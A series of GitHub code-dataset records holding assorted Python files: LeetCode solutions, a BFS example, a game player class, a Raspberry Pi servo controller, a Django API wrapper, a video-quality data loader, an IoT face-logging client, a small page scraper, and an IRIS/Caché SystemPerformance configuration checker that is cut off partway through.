4:pd.Int64Dtype(), 5:pd.Int64Dtype()})\n\nbonds=[]\nfor i,r in d.iterrows():\n if i == 0: continue\n print(r[1])\n for c in r[2:]:\n if type(c) == type(0):\n # print(c)\n bonds.append((r[1], c))\n\nbonds\n# lines[0]\n# import re\n# coords = re.sub(r' +',\",\",lines[0]).split(\",\")[6:9]\n# len(lines)\n","repo_name":"guillefix/neosvr-molecule-server","sub_path":"pdbsandbox.py","file_name":"pdbsandbox.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73145093520","text":"import cmath\nimport math\n\n# EXPERIMENTAL\nimport genericObject\n\nNORM_K = (1 / math.sqrt(2))\nFOV = math.pi / 3\nHALF_FOV = FOV/2\nCASTED_RAYS = 120\nSTEP_ANGLE = FOV / CASTED_RAYS\n\n\nclass Player:\n def __init__(self):\n self.state = \"standing\"\n self.location = (0, 0)\n self.speed = 5\n self.sprint = 10\n self.walk = 5\n self.crouch_speed = 2.5\n self.walk_speed = 5\n self.sprint_speed = 10\n self.run_multiplayer = 2\n self.crouch_multiplayer = 0.5\n self.walk_multiplayer = 1\n self.multiplayer = 1\n self.crouch_on = 0\n self.crouch_off = 1\n self.run_on = 2\n self.run_off = 1\n self.velocity = 0\n self.gravity_acceleration = 0.5\n self.jump_force 
= 15\n self.crouch = 1\n self.direction_h = 0\n self.direction_y = 0\n self.run = 1\n self.hit_box = (100, -100)\n self.stand_hit_box = (100, -200)\n self.crouch_hit_box = (100, -100)\n self.direction = (0, 0)\n self.rotation = (0, 0)\n self.current_speed = 0\n self.angle = 0\n self.player_angle = math.pi\n self.FOV = FOV\n self.HALF_FOV = HALF_FOV\n self.CASTED_RAYS = CASTED_RAYS\n self.STEP_ANGLE = STEP_ANGLE\n\n # EXPERIMENTAL\n self.rigid_body = genericObject.Player(self.location, self.angle)\n\n def move_normalize(self):\n speed_x = round(math.cos(self.angle) * self.current_speed)\n speed_y = round(math.sin(self.angle) * self.current_speed)\n self.location = (self.location[0] + speed_x, self.location[1] + speed_y)\n\n def update_speed(self):\n return self.speed * self.run\n\n def update_angle(self):\n return cmath.phase(complex(self.direction[0], self.direction[1]) * complex(self.rotation[0], self.rotation[1]))\n\n def move_h(self):\n self.location = (self.location[0] + self.direction_h * self.speed * self.run * self.crouch, self.location[1])\n\n def move_v(self):\n self.location = (self.location[0], self.location[1] + self.direction_y * self.speed * self.run * self.crouch)\n\n def setup(self, mouse_location):\n self.direction = (0, 0)\n self.current_speed = 0\n self.rotation = (mouse_location[0] - self.location[0], mouse_location[1] - self.location[1])\n self.angle = cmath.phase(complex(self.rotation[0], self.rotation[1]))\n\n def update(self):\n # ===================EXPERIMENTAL===================\n self.location = self.rigid_body.get_pos()\n # ==================================================\n if self.direction != (0, 0):\n self.angle = self.update_angle()\n self.current_speed = self.update_speed()\n self.move_normalize()\n # ===================EXPERIMENTAL===================\n self.rigid_body.set_pos(self.location)\n # ==================================================\n","repo_name":"yummy2eat/DSS-Engine","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32291901126","text":"from django_swagger_utils.drf_server.utils.decorator.interface_decorator \\\n import validate_decorator\nfrom .validator_class import ValidatorClass\nimport dataclasses\nfrom typing import List\n\nfrom reporting_portal.storages.storage_implementation \\\n import StorageImplementation\nfrom reporting_portal.presenters.observation_presenter_implementation \\\n import ObservationPresenterImplementation\nfrom reporting_portal.constants.enums import Severity\nfrom ...interactors.create_observation_interactor import CreateObservationInteractor\n\nSEVERITY = Severity.get_list_of_tuples()\n\n\n@dataclasses.dataclass()\nclass ObservationDto:\n title: str\n category_id: int\n subcategory_id: int\n severity: SEVERITY\n description: str\n attachments: List[str]\n\n\n@validate_decorator(validator_class=ValidatorClass)\ndef api_wrapper(*args, **kwargs):\n request_data = kwargs['request_data']\n title = request_data['title']\n category_id = request_data['category_id']\n sub_category_id = request_data['sub_category_id']\n severity = request_data['severity']\n description = request_data['description']\n attachments = request_data['attachments']\n\n observation_dto = ObservationDto(\n title=title,\n category_id=category_id,\n subcategory_id=sub_category_id,\n severity=severity,\n description=description,\n attachments=attachments\n )\n\n storage = StorageImplementation()\n 
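# the presenter below is handed to the interactor, whose result is returned as the response\n 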
presenter = ObservationPresenterImplementation()\n\n interactor = CreateObservationInteractor(\n storage=storage\n )\n response = interactor.create_observation_wrapper(\n observation_dto=observation_dto,\n presenter=presenter\n )\n return response\n","repo_name":"Lavanyarr/reporting_portal","sub_path":"reporting_portal/views/create_observation/api_wrapper.py","file_name":"api_wrapper.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43231585130","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: kafkal\n@contact: 1051748335@qq.com\n@software: pycharm\n@file: 53.py\n@time: 2019/2/14 014 11:14\n@desc:\nGiven an integer array nums, find the contiguous subarray (containing at least one element) that has the largest sum, and return that sum.\n\nExample:\n\nInput: [-2,1,-3,4,-1,2,1,-5,4],\nOutput: 6\nExplanation: the contiguous subarray [4,-1,2,1] has the largest sum, which is 6.\n\n\n'''\n\ndef maxSubArray(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if len(nums) == 0:\n return 0\n else:\n sum = nums[0]\n temp = 0\n for i in nums:\n if temp+i > i:\n temp = temp+i\n else:\n temp = i\n sum = max(temp,sum)\n return sum\n # sum = 0\n # max_sub_sum = nums[0]\n # for i in nums:\n # sum = sum + i\n # max_sub_sum = max(sum,max_sub_sum)\n # # if sum > max_sub_sum:\n # # max_sub_sum = sum\n # if sum < 0:\n # sum = 0\n # return max_sub_sum\n\nnums = [-2,1,-3,4,-1,2,1,-5,4]\nprint(maxSubArray(nums))","repo_name":"kafkalm/LeetCode","sub_path":"LeetCode/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7674430854","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\n\n# Camera servo\n# Initialize Camera Servo\nCAMERA_SERVO_PIN = 4\nLEFT_MAX_ROTATION = 12.5\nRIGHT_MIN_ROTATION = 7.5\nROTATION_STEP = 1.5\nSTARTING_ROTATION = 11.5\nhorz_servo_pin = 12\nGPIO.setup(CAMERA_SERVO_PIN, GPIO.OUT)\ncameraServo = GPIO.PWM(CAMERA_SERVO_PIN, 50)\n\n\ndef camera_rotate(direction, start):\n global camer_servo_pos\n if start:\n camer_servo_pos = STARTING_ROTATION\n cameraServo.start(camer_servo_pos)\n else:\n if direction == \"DOWN\":\n if (camer_servo_pos + ROTATION_STEP) >= LEFT_MAX_ROTATION:\n camer_servo_pos = LEFT_MAX_ROTATION\n else:\n camer_servo_pos += ROTATION_STEP\n cameraServo.ChangeDutyCycle(camer_servo_pos)\n elif direction == \"UP\":\n if (camer_servo_pos - ROTATION_STEP) <= RIGHT_MIN_ROTATION:\n camer_servo_pos = RIGHT_MIN_ROTATION\n else:\n camer_servo_pos -= ROTATION_STEP\n cameraServo.ChangeDutyCycle(camer_servo_pos)\n print(direction, camer_servo_pos)\n time.sleep(.5)\n cameraServo.ChangeDutyCycle(0)\n\ncamera_rotate(\"DOWN\", True)\n\n\nclass Servos(object):\n\n @staticmethod\n def command(servo_status):\n if servo_status is not None:\n if servo_status.direction:\n camera_rotate(servo_status.direction, False)\n","repo_name":"schlank/UberPi","sub_path":"robot/Servos.py","file_name":"Servos.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25878032072","text":"from sys import stdout\nwr = stdout.write\n\n\ndef add_edge(v, w):\n ady[v].append(w)\n\n\ndef bfs(s):\n visited = [[] for i in range(V)]\n queue = []\n visited[s] = True\n queue.append(s)\n while len(queue) != 0:\n # queue.poll()\n s = queue[0]\n queue = queue[1:]\n \n wr(f'{str(s)} ')\n aux = ady[s]\n for j in range(len(aux)):\n n = aux[j]\n if(not visited[n]):\n visited[n] = True\n queue.append(n)\n\n\nV = 
4\nady = [[] for i in range(V)]\nadd_edge(0, 1)\nadd_edge(0, 2)\nadd_edge(1, 2)\nadd_edge(2, 0)\nadd_edge(2, 3)\nadd_edge(3, 3)\ninicial = 0\nwr(f'Following BFS from node {inicial}\\n')\nbfs(inicial)\n","repo_name":"roca12/gpccodes","sub_path":"Codigos estudiantes por lenguaje/PY/Bryann Valderrama/Grafos/BFS_BusquedaEnAnchura.py","file_name":"BFS_BusquedaEnAnchura.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"6845467000","text":"import pascal\nimport re\n\ndef getBin(a:int,b:int,n:int):\n\n \"\"\"Returns Newton's binomial expansion of (a + b) ^ n as a string\"\"\"\n\n res = []\n bN = 0\n aN = n\n for i in pascal.makePascal(n)[n-1]:\n res.append( f\"{i}*({a}^{aN})*({b}^{bN})\" ) \n aN -= 1\n bN += 1\n joined = \" + \".join(res)\n return joined\n\ndef getK():\n pass\n\ndef main():\n i = input(\"enter a binomial (a+b): \")\n n = int(input(\"to what power?: \"))\n regex = re.search(r\"(\\d+)\\+(\\d+)\", i)\n\n print(getBin(int(regex.group(1)), int(regex.group(2)), n))\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ralfseduards/vscode-main","sub_path":"maths/newtBin.py","file_name":"newtBin.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69823212241","text":"class Solution:\n # @param a, a string\n # @param b, a string\n # @return a string\n def addBinary(self, a, b):\n la,lb = len(a)-1,len(b)-1\n c = 0\n result = []\n while la >= 0 or lb >= 0:\n ia, ib = 0, 0\n if la >= 0:\n ia = 1 if a[la] == '1' else 0\n if lb >= 0:\n ib = 1 if b[lb] == '1' else 0\n r = ia + ib + c\n c = 1 if r >= 2 else 0\n r = r % 2\n result.append(r)\n la -= 1\n lb -= 1\n if c: result.append(c)\n result.reverse()\n return ''.join(str(i) for i in result)\n","repo_name":"FreezingGod/leetcode","sub_path":"add_binary/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71722592400","text":"from __future__ import absolute_import, division, print_function\nimport numpy as np\n\n# Define DB information\nBASE_PATH = 'Your DB path'\nLIST_FILE_NAME = 'CSIQ_VQA.txt'\nALL_SCENES = list(range(12))\nALL_DIST_TYPES = list(range(7)) #including reference\n\n\ndef make_image_list(scenes, dist_types=None, show_info=True):\n \"\"\"\n Make image list from CSIQ VIDEO database\n CSIQ: 12 reference videos x 7 types (including REFERENCE)\n \"\"\"\n # Get reference / distorted image file lists:\n # d_img_list and score_list\n d_vid_list, r_vid_list, r_idx_list, score_list, fps_list = [], [], [], [], []\n # list_file_name = os.path.join(BASE_PATH, LIST_FILE_NAME)\n list_file_name = LIST_FILE_NAME\n with open(list_file_name, 'r') as listFile:\n for line in listFile:\n # ref_idx ref_name dist_name dist_types, DMOS, width, height\n scn_idx, dis_idx, ref, dis, score, width, height, fps= line.split()\n scn_idx = int(scn_idx)\n dis_idx = int(dis_idx)\n if scn_idx in scenes and dis_idx in dist_types:\n d_vid_list.append(dis)\n r_vid_list.append(ref)\n r_idx_list.append(scn_idx)\n score_list.append(float(score))\n fps_list.append(fps)\n\n score_list = np.array(score_list, dtype='float32')\n # DMOS -> reverse subjective scores by default\n score_list = 1 - score_list\n\n n_videos = len(d_vid_list)\n\n dist_names = ['ref', 'AVC', 'Packet', 'MJPEG', 'Wavelet', 'WN', 'HEVC']\n # Distortion types\n # 
0 = ref\n # 1 = H.264 / AVC compression\n # 2 = H.264 video with packet loss rate\n # 3 = MJPEG compression\n # 4 = Wavelet compression(snow codec)\n # 5 = White noise\n # 6 = HEVC compression\n\n if show_info:\n scenes.sort()\n print(' - Scenes: %s' % ', '.join([str(i) for i in scenes]))\n print(' - Distortion types: %s' % ', '.join(\n [dist_names[idx] for idx in dist_types]))\n print(' - Number of videos: {:,}'.format(n_videos))\n print(' - DMOS range: [{:.2f}, {:.2f}]'.format(\n np.min(score_list), np.max(score_list)), end='')\n print(' (Scale reversed)')\n\n return {\n 'scenes': scenes,\n 'dist_types': dist_types,\n 'base_path': BASE_PATH,\n 'n_images': n_videos,\n 'n_videos': n_videos,\n 'd_img_list': d_vid_list,\n 'r_img_list': r_vid_list,\n 'r_idx_list': r_idx_list,\n 'score_list': score_list,\n 'fps_list': fps_list\n }\n","repo_name":"haitian2du/DeepVQA_Release","sub_path":"VQA_Deep/data_load/CSIQ_VQA.py","file_name":"CSIQ_VQA.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38182455064","text":"import requests\nimport json\nimport time\n\n\nclass Client:\n def __init__(self, device_id, url='http://185.252.30.176/'):\n self.url = url\n self.device_id = device_id\n self.access_token = None\n\n def send_request(self, req_type, **kwargs):\n req_url = self.url + req_type\n return requests.post(req_url,\n json=kwargs,\n headers={'Content-Type': 'application/json'})\n\n def hello(self):\n result = self.send_request('hello/', device_id=self.device_id)\n if result.json()['message'] == 'Device is yet to be claimed by a user':\n return -1\n while not result.json()['ok']:\n time.sleep(1)\n result = self.send_request('hello/', device_id=self.device_id)\n else:\n self.access_token = result.json()['response']['token']\n return 0\n\n def fetch(self):\n result = self.send_request('fetch/', token=self.access_token)\n encodings = [json.loads(result.json()['response']['faces'][i]['embedding'])\n for i in range(len(result.json()['response']['faces']))]\n ids = [result.json()['response']['faces'][i]['face_id']\n for i in range(len(result.json()['response']['faces']))]\n in_count = result.json()['response']['in_count']\n return encodings, ids, in_count\n\n def introduce(self, pic, embedding):\n introduce_url = self.url + 'introduce/'\n result = requests.post(introduce_url,\n data={'token': self.access_token, 'embedding': json.dumps(embedding)},\n files={'image': pic})\n\n if result.json()['ok']:\n return {'ok': True, 'face_id': result.json()['response']['face_id']}\n else:\n return {'ok': False}\n\n def log(self, face_id, enter):\n result = self.send_request('log/', token=self.access_token, face_id=face_id, kind='E' if enter else 'L')\n return result.json()\n","repo_name":"vahidzee/pi-surveillance","sub_path":"pi/src/iot.py","file_name":"iot.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"7110066072","text":"import requests\nimport parsel\n\nkey_word=input('输入搜索关键词: ')\nheaders = {\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'\n}\nurl='https://wnacg.com/albums-index-page-1-sname-%s.html' % key_word\nhtml=requests.get(url=url,headers=headers).text\npage_num_list=parsel.Selector(html).xpath('//*[@id=\"bodywrap\"]/div[2]/div[2]/div')\nfor i in page_num_list:\n try:\n 
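# print the text of the last page-number link; the except branch below falls back to '1'\n 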
print(i.xpath('./a/text()').extract()[-1])\n except:\n print('1')\n\n# print(html)","repo_name":"Erica-Iris/Python","sub_path":"WNACG_Downer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21519263582","text":"\"\"\"\nCheck IRIS SystemPerformance or Caché pButtons\n\nExtract useful details to create a performance report.\nValidate common OS and IRIS/Caché configuration settings and show pass, fail\nand suggested fixes.\n\n\"\"\"\n\n\ndef shared_memory_estimate(\n global_buffers_mb,\n routine_buffers_mb,\n gmheap_in_mb,\n number_of_logical_cpus,\n jrnbufs_in_mb,\n MaxServerConn,\n MaxServers,\n):\n\n # Shared memory size in MB =\n # [global buffers in MB] * 1.08 + [routine buffers in MB] * 1.02\n # + [gmheap in KB]/1024 + 2 * [number of logical CPUs] + [jrnbufs in MB] +\n # 2 * ( [MaxServerConn] + [MaxServers]) + 300 [overall fixed padding]\n\n overall_fixed_padding = 300\n\n total_shared_memory = (\n (global_buffers_mb * 1.08)\n + (routine_buffers_mb * 1.02)\n + gmheap_in_mb\n + (2 * number_of_logical_cpus)\n + jrnbufs_in_mb\n + (2 * (MaxServerConn + MaxServers))\n + overall_fixed_padding\n )\n\n return int(total_shared_memory)\n\n\ndef system_check(input_file):\n sp_dict = {}\n operating_system = \"\"\n cpf_section = False\n\n linux_info_available = False\n dev_mapper_section = True\n dev_mapper_counter = 0\n\n filesystem_info_available = False\n filesystem_section = True\n filesystem_counter = 0\n\n shared_memory_available = False\n shared_memory_section = True\n shared_memory_counter = 0\n shared_memory_total = 0\n\n with open(input_file, \"r\", encoding=\"ISO-8859-1\") as file:\n\n model_name = True\n windows_info_available = False\n\n memory_next = False\n perfmon_next = False\n\n up_counter = 0\n\n for line in file:\n\n if \"[ConfigFile]\" in line:\n cpf_section = True\n elif \"!-- beg_mgstat --\" in line:\n cpf_section = False\n\n # Summary\n\n if \"VMware\" in line:\n sp_dict[\"platform\"] = \"VMware\"\n\n if \"Customer: \" in line:\n customer = (line.split(\":\")[1]).strip()\n sp_dict[\"customer\"] = customer\n\n if \"overview=\" in line:\n sp_dict[\"overview\"] = (line.split(\"=\")[1]).strip()\n\n # Product Version String:\n if \"Version String: \" in line or \"Product Version String: \" in line:\n sp_dict[\"version string\"] = (line.split(\":\", 1)[1]).strip()\n\n if \"Windows\" in line:\n sp_dict[\"operating system\"] = \"Windows\"\n operating_system = \"Windows\"\n elif \"Linux\" in line:\n sp_dict[\"operating system\"] = \"Linux\"\n operating_system = \"Linux\"\n elif \"AIX\" in line:\n sp_dict[\"operating system\"] = \"AIX\"\n operating_system = \"AIX\"\n elif \"Ubuntu\" in line:\n sp_dict[\"operating system\"] = \"Ubuntu\"\n operating_system = \"Ubuntu\"\n # Placeholder for when I care.\n elif \"Oracle Solaris\" in line:\n sp_dict[\"operating system\"] = \"Unknown\"\n operating_system = \"Unknown\"\n else:\n sp_dict[\"operating system\"] = \"Unknown\"\n operating_system = \"Unknown\"\n\n if \"Profile run \" in line:\n sp_dict[\"profile run\"] = line.strip()\n\n if \"Run over \" in line:\n sp_dict[\"run over\"] = line.strip()\n\n if \"on machine\" in line:\n sp_dict[f\"instance\"] = (line.split(\" on machine \", 1)[0]).strip()\n sp_dict[f\"linux hostname\"] = (line.split(\" on machine \", 1)[1]).strip()\n\n if line.startswith(\"up \"):\n up_counter += 1\n sp_dict[f\"up instance {up_counter}\"] = (line.split(\" \", 1)[1]).strip()\n\n # 
mgstat\n\n if \"numberofcpus=\" in line:\n sp_dict[\"mgstat header\"] = line.strip()\n\n mgstat_header = sp_dict[\"mgstat header\"].split(\",\")\n for item in mgstat_header:\n if \"numberofcpus\" in item:\n sp_dict[\"number cpus\"] = item.split(\"=\")[1].split(\":\")[0]\n\n # Linux cpu info\n\n if \"model name\t:\" in line:\n if model_name:\n model_name = False\n sp_dict[\"processor model\"] = (line.split(\":\")[1]).strip()\n\n # CPF file\n\n if cpf_section:\n if \"AlternateDirectory=\" in line:\n sp_dict[\"alternate journal\"] = (line.split(\"=\")[1]).strip()\n if \"CurrentDirectory=\" in line and not line[0] == \";\":\n sp_dict[\"current journal\"] = (line.split(\"=\")[1]).strip()\n if \"globals=\" in line:\n sp_dict[\"globals\"] = (line.split(\"=\")[1]).strip()\n if \"gmheap=\" in line:\n sp_dict[\"gmheap\"] = (line.split(\"=\")[1]).strip()\n if \"locksiz=\" in line:\n sp_dict[\"locksiz\"] = (line.split(\"=\")[1]).strip()\n if \"routines=\" in line:\n sp_dict[\"routines\"] = (line.split(\"=\")[1]).strip()\n if \"wijdir=\" in line:\n sp_dict[\"wijdir\"] = (line.split(\"=\")[1]).strip()\n if \"FreezeOnError\" in line:\n sp_dict[\"freeze\"] = (line.split(\"=\")[1]).strip()\n if \"Asyncwij=\" in line:\n sp_dict[\"asyncwij\"] = (line.split(\"=\")[1]).strip()\n if \"wduseasyncio=\" in line:\n sp_dict[\"wduseasyncio\"] = (line.split(\"=\")[1]).strip()\n if \"jrnbufs=\" in line:\n sp_dict[\"jrnbufs\"] = (line.split(\"=\")[1]).strip()\n\n # Chad's metrics\n if \"CACHESYS=\" in line:\n sp_dict[\"CACHESYS\"] = (line.split(\"=\")[1]).strip()\n if \"IRISSYS=\" in line:\n sp_dict[\"IRISSYS\"] = (line.split(\"=\")[1]).strip()\n if \"memlock=\" in line:\n sp_dict[\"memlock\"] = (line.split(\"=\")[1]).strip()\n if \"WebServer=\" in line:\n sp_dict[\"WebServer\"] = (line.split(\"=\")[1]).strip()\n if \"MaxServers=\" in line:\n sp_dict[\"MaxServers\"] = (line.split(\"=\")[1]).strip()\n if \"MaxServerConn=\" in line:\n sp_dict[\"MaxServerConn\"] = (line.split(\"=\")[1]).strip()\n if \"DaysBeforePurge=\" in line:\n sp_dict[\"DaysBeforePurge\"] = (line.split(\"=\")[1]).strip()\n\n # Linux filesystem info\n\n if \"<div id=Linuxinfo>\" in line:\n linux_info_available = True\n\n if linux_info_available:\n\n if \"/dev/mapper:\" in line:\n dev_mapper_section = True\n\n if dev_mapper_section:\n\n if \"->\" in line:\n sp_dict[f\"dev mapper {dev_mapper_counter}\"] = line.strip()\n dev_mapper_counter += 1\n\n if dev_mapper_counter > 0 and \"rw\" not in line:\n dev_mapper_section = False\n\n if \"<div id=df-m>\" in line:\n filesystem_info_available = True\n\n if filesystem_info_available:\n\n if \"Filesystem \" in line:\n filesystem_section = True\n\n if filesystem_section and \"</pre>\" in line:\n filesystem_section = False\n\n if filesystem_section:\n sp_dict[f\"filesystem df {filesystem_counter}\"] = line.strip()\n filesystem_counter += 1\n\n if \"Shared Memory Segments\" in line:\n shared_memory_available = True\n\n if shared_memory_available:\n if \"key\" in line:\n shared_memory_section = True\n\n if shared_memory_section and line.strip() == \"\":\n shared_memory_section = False\n shared_memory_available = False\n sp_dict[\n f\"Shared memory ipcs {shared_memory_counter}\"\n ] = f\"Total shared memory used: {int(shared_memory_total/1024/1024):,} MB\"\n sp_dict[\"Shared memory segment total\"] = shared_memory_total\n\n if shared_memory_section:\n if \"key\" not in line and \"----\" not in line:\n shared_memory_columns = line.split()\n shared_memory_bytes = int(shared_memory_columns[4])\n shared_memory_total += 
shared_memory_bytes\n\n sp_dict[f\"Shared memory ipcs {shared_memory_counter}\"] = line.strip()\n shared_memory_counter += 1\n\n # Linux kernel\n\n if \"swappiness\" in line:\n sp_dict[\"swappiness\"] = (line.split(\"=\")[1]).strip()\n\n # Number hugepages = shared memory. eg 48GB/2048 = 24576\n if \"vm.nr_hugepages\" in line:\n sp_dict[\"vm.nr_hugepages\"] = (line.split(\"=\")[1]).strip()\n\n # Shared memory must be greater than hugepages in bytes (IRIS shared memory)\n if \"kernel.shmmax\" in line:\n sp_dict[\"kernel.shmmax\"] = (line.split(\"=\")[1]).strip()\n if \"kernel.shmall\" in line:\n sp_dict[\"kernel.shmall\"] = (line.split(\"=\")[1]).strip()\n\n if \"max locked memory\" in line:\n sp_dict[\"max locked memory\"] = (line.split(\")\")[1]).strip()\n\n # dirty_* parameters are not relevant if using async IO – which any IRIS-based install should be.\n # # dirty background ratio = 5\n # if \"vm.dirty_background_ratio\" in line:\n # sp_dict[\"vm.dirty_background_ratio\"] = (line.split(\"=\")[1]).strip()\n #\n # # dirty ratio = 10\n # if \"vm.dirty_ratio\" in line:\n # sp_dict[\"vm.dirty_ratio\"] = (line.split(\"=\")[1]).strip()\n\n # Linux free\n\n if memory_next:\n if \"Memtotal\" in line:\n pass\n else:\n sp_dict[\"memory MB\"] = (line.split(\",\")[2]).strip()\n memory_next = False\n if \"<div id=free>\" in line:\n memory_next = True\n\n # Windows info\n if \"Windows info\" in line:\n windows_info_available = True\n\n if windows_info_available:\n if \"Host Name:\" in line:\n sp_dict[\"windows host name\"] = (line.split(\":\")[1]).strip()\n if \"OS Name:\" in line:\n sp_dict[\"windows os name\"] = (line.split(\":\")[1]).strip()\n if \"[01]: Intel64 Family\" in line:\n sp_dict[\"windows processor\"] = (line.split(\":\")[1]).strip()\n if \"Time Zone:\" in line:\n sp_dict[\"windows time zone\"] = line.strip()\n if \"Total Physical Memory:\" in line:\n sp_dict[\"windows total memory\"] = (line.split(\":\")[1]).strip()\n if \"hypervisor\" in line:\n sp_dict[\"windows hypervisor\"] = line.strip()\n\n # Windows perform\n\n if perfmon_next:\n sp_dict[\"perfmon_header\"] = line.strip()\n perfmon_next = False\n if \"beg_win_perfmon\" in line:\n perfmon_next = True\n\n # AIX\n if operating_system == \"AIX\":\n if \"Processor Type:\" in line:\n sp_dict[\"processor model\"] = (line.split(\":\")[1]).strip()\n if \"smt_threads\" in line:\n sp_dict[\"AIX SMT\"] = f'{(line.split(\" \")[1]).strip()}'\n if \"Memory Size:\" in line:\n sp_dict[\"memory MB\"] = (line.split(\":\")[1]).split()[0].strip()\n # Number Of Processors: 10\n # Memory Size: 24576 MB\n # smt_threads 8\n\n # # Debug\n # for key in sp_dict:\n # print(f\"{key} : {sp_dict[key]}\")\n\n # Tidy up not found keys\n\n if \"asyncwij\" not in sp_dict:\n sp_dict[\"asyncwij\"] = 0\n if \"wduseasyncio\" not in sp_dict:\n sp_dict[\"wduseasyncio\"] = 0\n\n if \"processor model\" not in sp_dict:\n if \"windows processor\" not in sp_dict:\n sp_dict[\"processor model\"] = \"Unknown Processor\"\n else:\n sp_dict[\"processor model\"] = sp_dict[\"windows processor\"]\n\n if \"memory MB\" not in sp_dict:\n if \"windows total memory\" in sp_dict:\n # Extract numbers only. 
Eg there may be point, commas, letters, and others from around the world.\n sp_dict[\"memory MB\"] = int(\"\".join(i for i in sp_dict[\"windows total memory\"] if i.isdigit()))\n else:\n sp_dict[\"memory MB\"] = 0\n\n return sp_dict\n\n\ndef build_log(sp_dict):\n # Build log for cut and paste\n\n ct_dict = {}\n pass_count = warn_count = recommend_count = 0\n ct_dict[\"swappiness\"] = 5\n\n # split up mgstat header\n\n mgstat_header = sp_dict[\"mgstat header\"].split(\",\")\n for item in mgstat_header:\n if \"numberofcpus\" in item:\n sp_dict[\"number cpus\"] = item.split(\"=\")[1].split(\":\")[0]\n\n # CPF\n\n if \"WebServer\" in sp_dict:\n if sp_dict[\"WebServer\"] == \"1\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"** Insecure Private Webserver Enabled! **\"\n\n if \"freeze\" in sp_dict:\n if sp_dict[\"freeze\"] == \"0\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"Journal freeze on error is not enabled. If journal IO errors occur \"\n f\"database activity that occurs during this period cannot be restored. \"\n )\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"freeze on error is enabled.\"\n\n if sp_dict[\"current journal\"] == sp_dict[\"alternate journal\"]:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"Primary Journal is the same as Alternate Journal\"\n\n if \"globals\" in sp_dict:\n globals = sp_dict[\"globals\"].split(\",\")\n globals_total = 0\n for item in globals:\n globals_total += int(item)\n sp_dict[\"globals total MB\"] = globals_total\n\n if \"routines\" in sp_dict:\n routines = sp_dict[\"routines\"].split(\",\")\n routines_total = 0\n for item in routines:\n routines_total += int(item)\n sp_dict[\"routines total MB\"] = routines_total\n\n # Chad's metrics\n\n if \"gmheap\" in sp_dict:\n if int(sp_dict[\"gmheap\"]) == 37568:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"gmheap is default\"\n\n if int(sp_dict[\"gmheap\"]) / 1024 < 200:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"gmheap {sp_dict['gmheap']} size does not support parallel dejournaling\"\n\n if \"locksiz\" in sp_dict:\n if int(sp_dict[\"locksiz\"]) == 16777216:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"locksiz is default\"\n if int(sp_dict[\"locksiz\"]) < 16777216:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"locksiz {sp_dict['locksiz']} is less than IRIS default (16777216)\"\n\n if \"wijdir\" in sp_dict:\n if sp_dict[\"wijdir\"] == \"\":\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = f\"WIJ in Installation Directory\"\n\n # Linux kernel\n\n if \"swappiness\" in sp_dict:\n if int(sp_dict[\"swappiness\"]) > ct_dict[\"swappiness\"]:\n warn_count += 1\n sp_dict[f\"warning {warn_count}\"] = (\n f\"swappiness is {sp_dict['swappiness']}. \"\n f\"For databases {ct_dict['swappiness']} \"\n f\"is recommended to adjust how aggressive the Linux kernel swaps memory \"\n f\"pages to disk. 
